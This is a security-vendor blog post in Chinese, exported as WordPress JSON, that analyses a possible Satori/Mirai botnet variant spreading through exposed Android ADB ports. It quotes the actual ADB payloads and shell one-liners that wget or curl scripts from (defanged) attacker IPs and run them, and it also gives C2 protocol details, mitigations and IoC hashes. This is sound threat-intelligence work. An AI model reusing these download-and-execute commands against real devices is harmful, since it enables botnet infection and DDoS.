{"id":56442,"date":"2018-08-07T09:00:30","date_gmt":"2018-08-07T01:00:30","guid":{"rendered":"https:\/\/blog.trendmicro.com.tw\/?p=56442"},"modified":"2018-08-06T11:08:31","modified_gmt":"2018-08-06T03:08:31","slug":"android%e8%a3%9d%e7%bd%ae%e7%9a%84-adb-%e7%ab%af%e5%8f%a3%e8%a2%ab%e6%94%bb%e6%93%8a%e7%94%a8%e4%be%86%e6%95%a3%e6%92%ad-satori-%e6%ae%ad%e5%b1%8d%e7%b6%b2%e8%b7%af%e8%ae%8a%e7%a8%ae","status":"publish","type":"post","link":"https:\/\/blog.trendmicro.com.tw\/?p=56442","title":{"rendered":"Android\u88dd\u7f6e\u7684 ADB \u7aef\u53e3\u88ab\u653b\u64ca,\u7528\u4f86\u6563\u64ad Satori \u6bad\u5c4d\u7db2\u8def\u8b8a\u7a2e"},"content":{"rendered":"<p>\u5c0d\u8a31\u591a<a href=\"https:\/\/blog.trendmicro.com.tw\/?p=8802\">\u7269\u806f\u7db2\uff08IoT ,Internet of Thing<\/a><a href=\"https:\/\/blog.trendmicro.com.tw\/?p=8802\">\uff09<\/a>\u4f7f\u7528\u8005\u4f86\u8aaa\uff0c\u88dd\u7f6e\u7aef\u53e3\u906d\u53d7\u653b\u64ca\u4e00\u76f4\u662f\u500b\u554f\u984c\u3002\u7279\u5225\u662fTCP\u7aef\u53e35555\uff0c\u56e0\u70ba\u5ee0\u5546\u7684\u9810\u8a2d\u958b\u555f\u800c<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/new-linux-malware-exploits-cgi-vulnerability\/\">\u5728\u904e\u53bb\u5e36\u4f86\u8a31\u591a\u554f\u984c<\/a>\uff0c\u8b93\u4f7f\u7528\u6236\u66b4\u9732\u5728\u653b\u64ca\u4e4b\u4e0b\u3002<\/p>\n<p><a href=\"https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2017\/02\/botnet-1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-47654\" src=\"https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2017\/02\/botnet-1.png\" alt=\"\" width=\"1596\" height=\"899\" srcset=\"https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2017\/02\/botnet-1.png 1596w, https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2017\/02\/botnet-1-300x169.png 300w, https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2017\/02\/botnet-1-768x433.png 768w, https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2017\/02\/botnet-1-1024x577.png 1024w, https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2017\/02\/botnet-1-600x338.png 600w, https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2017\/02\/botnet-1-800x451.png 800w\" sizes=\"(max-width: 1596px) 100vw, 1596px\" \/><\/a><\/p>\n<p><u><a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2651&amp;name=20110916\">\u8da8\u52e2\u79d1\u6280<\/a><\/u>\u6700\u8fd1\u57287\u67089\u65e5\u81f310\u65e5\u53ca7\u670815\u65e5\u5075\u6e2c\u5230\u5169\u500b\u53ef\u7591\u7684\u6d3b\u52d5\u9ad8\u5cf0\uff0c\u767c\u73fe\u4e86\u4f7f\u7528\u7aef\u53e35555\u7684\u65b0\u6f0f\u6d1e\u653b\u64ca\u3002\u9019\u4e00\u6b21\u653b\u64ca\u5229\u7528\u4e86Android Debug Bridge\uff08ADB\uff09\u547d\u4ee4\u5217\u5de5\u5177\uff0c\u9019\u500bAndroid SDK\u5de5\u5177\u53ef\u4ee5\u7528\u4f86\u8655\u7406\u88dd\u7f6e\u9593\u7684\u901a\u8a0a\uff0c\u4e5f\u8b93\u958b\u767c\u4eba\u54e1\u53ef\u4ee5\u5728Android\u88dd\u7f6e\u4e0a\u57f7\u884c\u548c\u9664\u932f\u61c9\u7528\u7a0b\u5f0f\u3002\u6211\u5011\u7684\u8cc7\u6599\u986f\u793a\u7b2c\u4e00\u6ce2\u4e3b\u8981\u51fa\u73fe\u5728\u4e2d\u570b\u548c\u7f8e\u570b\uff0c\u800c\u7b2c\u4e8c\u6ce2\u4e3b\u8981\u662f\u97d3\u570b\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2018\/06\/ADBPort1.jpg\" alt=\" Figure 1. Activity in the TCP Port 5555 from July 1 to July 15. Note the spike on July 9 and 10 and a second spike on July 15\" \/><\/p>\n<p><em>\u57161<\/em><em>\u30017<\/em><em>\u67081<\/em><em>\u65e5\u81f37<\/em><em>\u670815<\/em><em>\u65e5\u9593TCP<\/em><em>\u7aef\u53e35555<\/em><em>\u7684\u6d3b\u52d5\u8cc7\u6599\u3002\u6ce8\u610f\u52307<\/em><em>\u67089<\/em><em>\u65e5\u548c10<\/em><em>\u65e5\u51fa\u73fe\u7684\u9ad8\u5cf0\u53ca7<\/em><em>\u670815<\/em><em>\u65e5\u7684\u7b2c\u4e8c\u6b21\u9ad8\u5cf0<\/em><\/p>\n<p><!--more--><\/p>\n<p><strong><em>\u6280\u8853\u5206\u6790<\/em><\/strong><\/p>\n<p>\u6839\u64da<u><a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2651&amp;name=20110916\">\u8da8\u52e2\u79d1\u6280<\/a><\/u>\u5c0d\u7db2\u8def\u5c01\u5305\u7684\u5206\u6790\uff0c\u53ef\u4ee5\u78ba\u5b9a\u60e1\u610f\u8edf\u9ad4\u900f\u904e\u6383\u63cfADB\u7aef\u53e3\u4f86\u9032\u884c\u6563\u64ad\u3002\u5b83\u7d93\u7531ADB\u9023\u7dda\u690d\u5165\u7b2c\u4e00\u968e\u6bb5\u7684shell\u8173\u672c\u4f86\u5728\u76ee\u6a19\u7cfb\u7d71\u4e0a\u555f\u52d5\u3002\u9019\u500b\u8173\u672c\u6703\u4e0b\u8f09\u8ca0\u8cac\u555f\u52d5\u7b2c\u4e09\u968e\u6bb5\u6a94\u6848\u7684\u5169\u500b\u7b2c\u4e8c\u968e\u6bb5shell\u8173\u672c\u3002<\/p>\n<p>\u5b83\u900f\u904eTCP\u7aef\u53e35555\u4e0a\u50b3\u6709\u6548\u8f09\u8377\uff08Payload\uff09\u4f86\u653b\u64caADB\uff1a<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li>\u201cCNXN\u201d,0,0,0,1,0,0\u00d710,0,0,7,0,0,0,\u201d2\u2033,2,0,0,0xBC,0xB1,0xA7,0xB1,\u201dhost::\u201d<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>\u4e00\u65e6\u9032\u5165\u88dd\u7f6e\uff0c\u6709\u6548\u8f09\u8377\uff08Payload\uff09\u6703\u5c07\u81ea\u5df1\u5f9e\u78c1\u789f\u522a\u9664\uff0c\u4e26\u91cd\u65b0\u547d\u540d\u70ba\u52a0\u4e0aCPU\u67b6\u69cb\u5b57\u4e32\u7684\u96a8\u6a5f\u540d\u7a31\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u6709\u6548\u8f09\u8377\uff08Payload\uff09\u6703\u4e0b\u8f09shell\u8173\u672c\uff0c\u9019\u8173\u672c\u6703\u5728\u57f7\u884c\u5f8c\u522a\u9664\uff1a<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li>\u201cOPENX\u201d,2,0,0,0,0,0,0,0xF2,0x17,\u201dJ\u201d,0,0,0xB0,0xAF,0xBA,0xB1,\u201dshell:&gt;\/sdcard\/Download\/f &amp;&amp; cd \/sdcard\/Download\/; &gt;\/dev\/f &amp;&amp; cd \/dev\/; &gt;\/data\/local\/tmp\/f &amp;&amp; cd \/data\/local\/tmp\/; busybox wget hxxp:\/\/185[.]62[.]189[.]149\/adbs -O -&gt; adbs; sh adbs; curl hxxp:\/\/185[.]62[.]189[.]149\/adbs2 &gt; adbs2; sh adbs2; rm adbs adbs2\u2033<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>7\u67089\u65e5\u6d3b\u52d5\u7684shell\u8173\u672c\u5982\u4e0b\uff1a<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li>cd \/dev\/; busybox wget hxxp:\/\/95[.]215[.]62[.]169\/adbs -O -&gt; adbs; sh adbs; rm adbs<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2018\/06\/ADB-Port2.png\" alt=\" Figure 3. ASCII and hex view of the malicious payload from the July 9 activity\" \/><\/p>\n<p><em>\u57162<\/em><em>\u30017<\/em><em>\u67089<\/em><em>\u65e5\u6240\u51fa\u73fe\u60e1\u610f\u6709\u6548\u8f09\u8377\uff08Payload<\/em><em>\uff09\u7684ASCII<\/em><em>\u548c\u5341\u516d\u9032\u4f4d\u8996\u5716<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>\u800c7\u670815\u65e5\u6d3b\u52d5\u7684\u6709\u6548\u8f09\u8377\uff08Payload\uff09\u5247\u662f\u4e0b\u8f09\u4e86\u5169\u500b\u8173\u672c\uff1a\u4e4b\u524d\u7684\u201cadbs\u201d\u548c\u540d\u70ba\u201cadbs2\u201d\u7684\u65b0\u8173\u672c\u3002\u548c\u4e4b\u524d\u4e00\u6a23\uff0c\u6703\u5728\u57f7\u884c\u5f8c\u522a\u9664\uff1a<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li>cd \/data\/local\/tmp\/; busybox wget hxxp:\/\/185[.]62[.]189[.]149\/adbs -O -&gt; adbs; sh adbs; curl hxxp:\/\/185[.]62[.]189[.]149\/adbs2 &gt; adbs2; sh adbs2; rm adbs adbs2<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2018\/06\/ADB-Port3.png\" alt=\" Figure 4. ASCII and hex view of the malicious payload from the July 15 activity\" \/><\/p>\n<p><em>\u57163<\/em><em>\u30017<\/em><em>\u670815<\/em><em>\u65e5\u6240\u51fa\u73fe\u60e1\u610f\u6709\u6548\u8f09\u8377\uff08Payload<\/em><em>\uff09\u7684ASCII<\/em><em>\u548c\u5341\u516d\u9032\u4f4d\u8996\u5716<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>\u60e1\u610f\u8173\u672c\u66ff\u4e0b\u500b\u968e\u6bb5\u4e0b\u8f09\u4e86\u591a\u7a2e\u67b6\u69cb\u7684\u6a94\u6848\u4e26\u555f\u52d5\u3002\u5b83\u5011\u90fd\u505a\u76f8\u540c\u7684\u4e8b\u60c5\uff0c\u4f46\u7528\u4e0d\u540c\u7684\u4e0b\u8f09\u65b9\u6cd5\u3002\u7b2c\u4e00\u500b\u4f7f\u7528curl\uff0c\u7b2c\u4e8c\u500b\u4f7f\u7528BusyBox\u7684wget\u3002wget\u7248\u672c\u7bc4\u4f8b\u5982\u4e0b\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2018\/07\/ADB-Port5a.png\" alt=\" Figure 5. Code of the binary that was downloaded via wget\" \/><\/p>\n<p><em>\u57164<\/em><em>\u3001\u7528wget<\/em><em>\u4e0b\u8f09\u57f7\u884c\u6a94<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>\u4e0b\u8f09\u7684\u6a94\u6848\u6703\u7528\u53c3\u6578\u201cyItDitb2HvayJvNc\u201d\u6aa2\u67e5\u81ea\u5df1\u662f\u5426\u70ba\u201c.\/.f\u201d\u3002\u5982\u679c\u662f\uff0c\u5c31\u6703\u4f7f\u7528\u4e3b\u6a5f\u540d\u7a31\u201cn[.]ukrainianhorseriding[.]com\u201d\uff0c\u900f\u904eGoogle\u7684DNS\u89e3\u6790C&amp;C\u4f3a\u670d\u5668\u7684\u5730\u5740\u3002\u5426\u5247\u5c31\u6703\u7528\u5167\u5efa\u7684IP\u5730\u574095[.]215[.]62[.]169\uff0c\u9023\u63a5\u7aef\u53e3\u70ba7267\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u63a5\u8457\u5b83\u6703\u95dc\u9589\u5168\u90e8\u7684\u4e09\u500bstdio\u4e32\u6d41\u4e26\u53d6\u5f97\u81ea\u5df1\u7684IP\u5730\u5740\uff0c\u518d\u555f\u52d5\u5169\u500b\u5b50\u7a0b\u5e8f\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u7b2c\u4e00\u500b\u6703\u6383\u63cf\/proc\/[pid]\/maps\uff08\u7cfb\u7d71\u57f7\u884c\u4e2d\u7a0b\u5e8f\u7684\u8a18\u61b6\u9ad4\u6620\u5c04\u5340\u57df\uff09\u4f86\u5c0b\u627esmi\u3001xig\u6216trinity\uff09\u3002\u5982\u679c\u627e\u5230\u5c31\u6703\u7d42\u6b62\u5c0d\u61c9\u7684\u7a0b\u5e8f\u3002Trinity\u53ef\u80fd\u8207Android system fuzzer\u6709\u95dc\uff0c\u800csmi\u662fCoinHive\u8173\u672c\u76f8\u95dc\u6a94\u6848\uff0c\u9019\u8173\u672c\u6703\u5728\u52ab\u6301\u7684Amazon\u88dd\u7f6e\u4e0a\u6316\u9580\u7f85\u5e63\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u7b2c\u4e8c\u500b\u5b50\u7a0b\u5e8f\u8ca0\u8cac\u7528\u8815\u87f2\u65b9\u5f0f\u4f86\u6563\u64ad\u60e1\u610f\u8edf\u9ad4\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u4e3b\u7a0b\u5f0f\u6703\u5c07\u524d\u9762\u6240\u63d0\u5230\u7684\u4e09\u500bpid\u4ee5\u4e8c\u9032\u4f4d\u683c\u5f0f\u5beb\u5165\u4ee5\u4e0b\u4f4d\u7f6e\u5176\u4e2d\u4e00\u500b\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2018\/06\/ADB-Port6.png\" alt=\" Figure 6. Locations where the pids are written\" \/><\/p>\n<p><em>\u57165<\/em><em>\u3001\u5beb\u5165pid<\/em><em>\u7684\u4f4d\u7f6e<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>\u63a5\u8457\u5b83\u6703\u958b\u555f\u8207C&amp;C\u4f3a\u670d\u5668\u7684\u9023\u7dda\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2018\/06\/ADB-Port7.jpg\" alt=\" Figure 7. Communicating with the C&amp;C server\" \/><\/p>\n<p><em>\u57166<\/em><em>\u3001\u8207C&amp;C<\/em><em>\u4f3a\u670d\u5668\u7684\u9023\u7dda<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>\u7136\u5f8c\u767c\u9001\u7279\u88fd\u8a0a\u606f\u7d66C&amp;C\u4f3a\u670d\u5668\u3002\u9577\u5ea6\u70ba71\u500b\u5b57\u5143\uff0c\u770b\u8d77\u4f86\u5982\u4e0b\uff1a<\/p>\n<p>&nbsp;<\/p>\n<p>\u201cWWau14TJ8IapVXrrlFq0q5sxB\u201d\uff0c\u201c\\x00 80 00 5A 00 57 00 C8 00 F0 00 1E 00 00\u201d\u4e26\u52a0\u4e0a\u67b6\u69cb\u5b57\u4e32\uff0c\u50cf\u662f\u201carm7\u201d<\/p>\n<p>&nbsp;<\/p>\n<p>C2 then sends to the victim<\/p>\n<p>&nbsp;<\/p>\n<p>2 bytes number (x)<\/p>\n<p>&nbsp;<\/p>\n<p>Interpretation is following:<\/p>\n<p>&nbsp;<\/p>\n<p>if x == 505: receive next 2 bytes from C2<\/p>\n<p>&nbsp;<\/p>\n<p>if x == 0xDD99: kill children and exit<\/p>\n<p>&nbsp;<\/p>\n<p>if x &gt; 1024: close connection and sleep(10)<\/p>\n<p>&nbsp;<\/p>\n<p>else:<\/p>\n<p>&nbsp;<\/p>\n<p>receive x bytes from C2 (they are not used, maybe this version is not finishet yet)<\/p>\n<p>&nbsp;<\/p>\n<p>receive new x<\/p>\n<p>&nbsp;<\/p>\n<p>recv payload containing attacking target list of len x bytes<\/p>\n<p>&nbsp;<\/p>\n<p>\u6bcf\u516d\u500b\u901a\u8a0a\u9031\u671f\uff0c\u53d7\u5bb3\u88dd\u7f6e\u6703\u56de\u61c9\u4e00\u500b6\u5b57\u5143\u5e8f\u5217\uff089,3,2,5,8,1\uff09\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u6b64\u7279\u88fd\u5c01\u5305\u5305\u542b\u4e86\u5e36\u6709\u8981\u767c\u9001\u7684\u76ee\u6a19\u6578\u8207IP\u5c01\u5305\u985e\u578b\u7684\u6a19\u982d\uff0c\u4ee5\u53ca\u76ee\u6a19IPv4\u5730\u5740\u5217\u8868\uff0c\u9019\u4e9b\u76ee\u6a19IPv4\u5730\u5740\u7d93\u904e\u53d7\u611f\u67d3\u4e3b\u6a5f\u7528\u96a8\u6a5f\u7522\u751f\u504f\u79fb\u91cf\u4fee\u6539\u904e\u3002\u63a5\u4e0b\u4f86\u662f\u7aef\u53e3\u865f\u78bc\u53ca\u7b49\u5f85\u7e7c\u7e8c\u9032\u884c\u524d\u7684\u4f11\u7720\u6642\u9593\u548c\u96a8\u6a5f\u7684\u6709\u6548\u8f09\u8377\uff08payload\uff09\u9577\u5ea6\u3002\u7136\u5f8c\u60e1\u610f\u8edf\u9ad4\u5c07\u5e36\u6709\u96a8\u6a5f\u7522\u751f\u6709\u6548\u8f09\u8377\uff08payload\uff09\u7684\u7279\u88fdIP\u5c01\u5305\u767c\u9001\u5230\u53d6\u5f97\u7684\u653b\u64ca\u5217\u8868 \u2013 \u53ef\u80fd\u662fDDoS\u653b\u64ca\u7684\u4e00\u90e8\u5206\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u7279\u88fd\u7684IP\u5c01\u5305\u7531\u4e0b\u5217\u7d44\u6210\uff1a<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li>UDP\uff1a\u5e36\u6709\u96a8\u6a5f\u9577\u5ea6\u7684\u96a8\u6a5f\u6709\u6548\u8f09\u8377<\/li>\n<li>TCP SYN\uff1a\u5e36\u6709\u96a8\u6a5f\u9577\u5ea6\u7684\u96a8\u6a5f\u6709\u6548\u8f09\u8377<\/li>\n<li>TCP ACK\uff1a\u5e36\u6709\u96a8\u6a5f\u9577\u5ea6\u7684\u96a8\u6a5f\u6709\u6548\u8f09\u8377<\/li>\n<li>UDP\uff1a\u5e36\u6709\u96a8\u6a5f\u6709\u6548\u8f09\u8377\u7528\u901a\u7528\u8def\u7531\u5c01\u88dd\uff08GRE\uff09\u901a\u9053\u50b3\u8f38<\/li>\n<li>TCP SYN\uff1a\u4e4b\u5f8c\u5b83\u6703\u767c\u9001TCP ACK\u4e26\u78ba\u4fddTCP windows size\uff0c\u4f86\u6e90\u7aef\u53e3\uff0cseq_number\u548cIP\u8b58\u5225\u78bc\u548c\u524d\u4e00\u500bsession\u4e00\u81f4\u3002\u6bcf\u500b\u5c01\u5305\u9593\u6709\u4e09\u79d2\u9418\u7684\u7b49\u5f85\u6642\u9593\u3002<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>\u95dc\u65bc\u4e0b\u8f09\u7684\u6a94\u6848\u4e00\u500b\u6709\u610f\u601d\u7684\u5730\u65b9\u662f\u7814\u7a76\u4eba\u54e1\u767c\u73feC&amp;C\u4f3a\u670d\u566895[.]215[.]62[.]169\u8ddfMirai\u6bad\u5c4d\u7db2\u8def\u7684Satori\u75c5\u6bd2\u6709\u95dc\u3002\u6df1\u5165\u7814\u7a76\u9019\u5169\u500bIP\u5730\u5740\u7684GeoIP\u8cc7\u8a0a\uff0c\u767c\u73fe\u5b83\u5011\u4f4d\u65bc\u6b50\u6d32\uff1b95[.]215[.]62[.]169\u5728\u897f\u73ed\u7259\u800c185[.]62[.]189[.]149\u5728\u8377\u862d\u3002<\/p>\n<p>\u300a\u5ef6\u4f38\u95b1\u8b80 \u300b:<a href=\"https:\/\/blog.trendmicro.com.tw\/?p=53935\" rel=\"bookmark\">\u7269\u806f\u7db2\u6bad\u5c4d\u7db2\u8defSatori\u539f\u59cb\u78bc,\u88ab\u516c\u958b\u5728Pastebin\u4e0a<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>\u6709\u7406\u7531\u76f8\u4fe1\u6b64\u6a23\u672c\u8ddfSatori\u80cc\u5f8c\u662f\u540c\u4e00\u500b\u4f5c\u8005\u3002\u91cd\u8981\u548c\u53ef\u8b58\u5225\u5b57\u4e32\u662f\u7528\u7c21\u55ae\u7684XOR\u65b9\u5f0f\u52a0\u5bc6\uff08\u53c3\u898b\u57168\u7684\u52a0\u5bc6\u5b57\u4e32\u7bc4\u4f8b\uff09\u3002\u6709\u610f\u601d\u7684\u662f\uff0c\u8ddf\u4f7f\u7528\u5b57\u5143\u4ea4\u63db\u52a0\u4e0aBase62\u7de8\u78bc\u7684\u820a\u6a23\u672c\u6bd4\u8d77\u4f86\uff0c\u6b64\u7248\u672c\u7684\u60e1\u610f\u8edf\u9ad4\u4f7f\u7528\u8f03\u4e0d\u8907\u96dc\u7684\u5b57\u4e32\u52a0\u5bc6\u65b9\u5f0f\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2018\/06\/ADB-Port8.png\" alt=\" Figure 8. Strings encrypted with XOR method\" \/><\/p>\n<p><em>\u57167<\/em><em>\u3001\u7528XOR<\/em><em>\u65b9\u5f0f\u52a0\u5bc6\u7684\u5b57\u4e32<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>\u89e3\u5bc6\u7684\u503c\u53ef\u4ee5\u5728\u4e0b\u5716\u4e2d\u770b\u5230\u3002\u8acb\u6ce8\u610f\uff0c\u4e26\u975e\u6240\u6709\u90fd\u5df2\u88ab\u4f7f\u7528\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2018\/06\/ADB-Port9.png\" alt=\" Figure 9. String values after decryption\" \/><\/p>\n<p><em>\u57168<\/em><em>\u3001\u89e3\u5bc6\u5f8c\u7684\u5b57\u4e32\u503c<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>\u5982\u524d\u6240\u8ff0\uff0c\u8815\u87f2\u529f\u80fd\u53ca\u6703\u5c0b\u627e\u5176\u4ed6\u6f5b\u5728\u76ee\u6a19\u53ef\u80fd\u4ee3\u8868\u6211\u5011\u6240\u5075\u6e2c\u5230\u7684\u5169\u500b\u6d3b\u52d5\u9ad8\u5cf0\u662f\u53e6\u4e00\u6ce2\u9020\u6210\u66f4\u591a\u50b7\u5bb3\u7684\u653b\u64ca\u524d\u594f\u3002\u4e5f\u8a31\u73fe\u5728\u99ed\u5ba2\u53ea\u662f\u5728\u6e2c\u8a66\u5de5\u5177\u548c\u653b\u64ca\u7b56\u7565\u7684\u6709\u6548\u6027\uff0c\u597d\u6e96\u5099\u66f4\u56b4\u91cd\u7684\u653b\u64ca\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>C&amp;C\u7db2\u57df\u540d\u7a31\u8cc7\u8a0a\u986f\u793a\u51fa\u8ddf\u53e6\u4e00\u500brippr[.]cc\u4e0a\u7684C&amp;C\u4f3a\u670d\u5668\u76f8\u540c\u7684\u8a3b\u518a\u90f5\u4ef6\u5730\u5740\uff0c\u8a72\u7db2\u57df\u5df2\u7d93\u95dc\u9589\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2018\/06\/ADB-Port10.jpg\" alt=\" Figure 10. Information on the C&amp;C domain\" \/><\/p>\n<p><em>\u57169<\/em><em>\u3001\u6709\u95dcC&amp;C<\/em><em>\u7db2\u57df\u7684\u8cc7\u8a0a<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>\u6839\u64daShodan\u7684\u8cc7\u6599\uff0c\u6709\u8d85\u904e48,000\u500b\u7269\u806f\u7db2\u7cfb\u7d71\u53ef\u80fd\u906d\u53d7ADB\u653b\u64ca\u3002\u4e26\u975e\u6240\u6709\u6709\u6b64\u6f0f\u6d1e\u7684\u7cfb\u7d71\u90fd\u6703\u66b4\u9732\u5728\u7db2\u8def\u4e0a\uff0c\u56e0\u70ba\u5b83\u5011\u901a\u5e38\u90fd\u6703\u96b1\u85cf\u5728\u5177\u5099NAT\u529f\u80fd\u7684\u8def\u7531\u5668\u5f8c\u9762\u3002\u4f46\u56e0\u70ba\u8a2d\u5b9a\u932f\u8aa4\uff0c\u53ef\u4ee5\u624b\u52d5\u6216\u900f\u904eUPnP NAT traversal\u4f86\u52a0\u4ee5\u5b58\u53d6\u3002\u7121\u8ad6\u4f7f\u7528\u8005\u7684\u5bc6\u78bc\u5f37\u5ea6\u5982\u4f55\uff0c\u6240\u6709\u7684\u591a\u5a92\u9ad4\u88dd\u7f6e\u3001\u667a\u6167\u578b\u96fb\u8996\u3001\u884c\u52d5\u96fb\u8a71\u53ca\u5176\u4ed6\u6c92\u6709\u984d\u5916\u4fdd\u8b77\u7684\u88dd\u7f6e\u90fd\u662f\u6b64\u60e1\u610f\u8edf\u9ad4\u53ef\u653b\u64ca\u7684\u76ee\u6a19\u3002<\/p>\n<p>&nbsp;<\/p>\n<p><strong><em>\u7de9\u89e3\u63aa\u65bd\u548c\u8da8\u52e2\u79d1\u6280\u89e3\u6c7a\u65b9\u6848<\/em><\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>\u6709\u80fd\u529b\u81ea\u884c\u66f4\u6539\u884c\u52d5\u88dd\u7f6e\u8a2d\u5b9a\u7684\u4f7f\u7528\u8005\u53ef\u4ee5\u9032\u5165\u8a2d\u5b9a\uff0c\u9078\u64c7\u201c\u958b\u767c\u4eba\u54e1\u9078\u9805\u201d\uff0c\u78ba\u4fdd\u201cADB (USB) debugging\u201d\u548c\u201c\u4f86\u81ea\u672a\u77e5\u4f86\u6e90\u7684\u61c9\u7528\u7a0b\u5f0f\u201d\u95dc\u9589\u3002\u5f8c\u4e00\u500b\u8a2d\u5b9a\u9810\u8a2d\u662f\u95dc\u9589\u7684\uff0c\u4e0d\u904e\u9084\u662f\u8981\u518d\u6b21\u6aa2\u67e5\u4ee5\u78ba\u8a8d\u3002\u5982\u679c\u4f7f\u7528\u8005\u61f7\u7591\u81ea\u5df1\u7684\u88dd\u7f6e\u5df2\u7d93\u53d7\u5230\u611f\u67d3\uff0c\u57f7\u884c\u56de\u5fa9\u51fa\u5ee0\u8a2d\u7f6e\u53ef\u4ee5\u6e05\u9664\u6709\u6548\u8f09\u8377\uff08payload\uff09\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u4f5c\u70ba\u901a\u7528\u5b88\u5247\uff0c\u884c\u52d5\u88dd\u7f6e\u4f7f\u7528\u8005\u61c9\u8a72\u8981\u5b9a\u671f\u66f4\u65b0\u88dd\u7f6e\u3002\u9019\u4e9b\u66f4\u65b0\u4e0d\u50c5\u53ef\u4ee5\u6539\u5584\u5176\u88dd\u7f6e\u7684\u529f\u80fd\uff0c\u9084\u53ef\u4ee5\u89e3\u6c7a\u653b\u64ca\u8005\u53ef\u4ee5\u5229\u7528\u7684\u6f0f\u6d1e\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u4e5f\u53ef\u9078\u64c7\u80fd\u5920\u62b5\u79a6\u9019\u4e9b\u5a01\u8105\u7684\u5b89\u5168\u8edf\u9ad4\u3002\u4f8b\u5982\u8da8\u52e2\u79d1\u6280\u7684Smart Home Network\u53ef\u4ee5\u7528\u4ee5\u4e0b\u5165\u4fb5\u9632\u79a6\u898f\u5247\u4f86\u4fdd\u8b77\u4f7f\u7528\u8005\u514d\u65bc\u6b64\u5a01\u8105\uff1a<\/p>\n<ul>\n<li>1134867 EXPLOIT Remote Command Execution via Android Debug Bridge<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>\u5165\u4fb5\u6307\u6a19\uff08IoC\uff09\uff1a<\/p>\n<p>&nbsp;<\/p>\n<p>\u5075\u6e2c\u70baUNIX_MIRAI.DLDS\u7684\u6a94\u6848\u96dc\u6e4a\u503c<\/p>\n<ul>\n<li>79d55852af173612562718544ecdc569b0b8e0094647d609040f8fcc67112cba<\/li>\n<li>144e9093b50d7a0bf92ccc29dbbdab4955a8ef028ec2a4a64f2c16778fc0ba43<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>\u5075\u6e2c\u6210ELF_MIRAI.LBOUG\u7684\u6a94\u6848\u96dc\u6e4a\u503c<\/p>\n<ul>\n<li>2815ab8fe6d48982540524c6ac55e1df3a77a2e90c32114fde05bdc3bb353bea<\/li>\n<li>144e9093b50d7a0bf92ccc29dbbdab4955a8ef028ec2a4a64f2c16778fc0ba43<\/li>\n<li>01eca0d68cc8c2d7ad6aa8021852b57a04b8a4ca7d13e164095b29fd06a1ed9f<\/li>\n<li>4c3983040b2c72e4df9742c1314dcf8cd703805ab6aaa9185324b70fd530746e<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>@\u539f\u6587\u51fa\u8655\uff1a<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/open-adb-ports-being-exploited-to-spread-possible-satori-variant-in-android-devices\/\">Open ADB Ports Being Exploited to Spread Possible Satori Variant in Android Devices<\/a><\/p>\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/open-adb-ports-being-exploited-to-spread-possible-satori-variant-in-android-devices\/\">Posted in:Internet of Things, Mobile<\/a> \u4f5c\u8005\uff1a Hubert Lin\uff0cLorin Wu\u548cVit 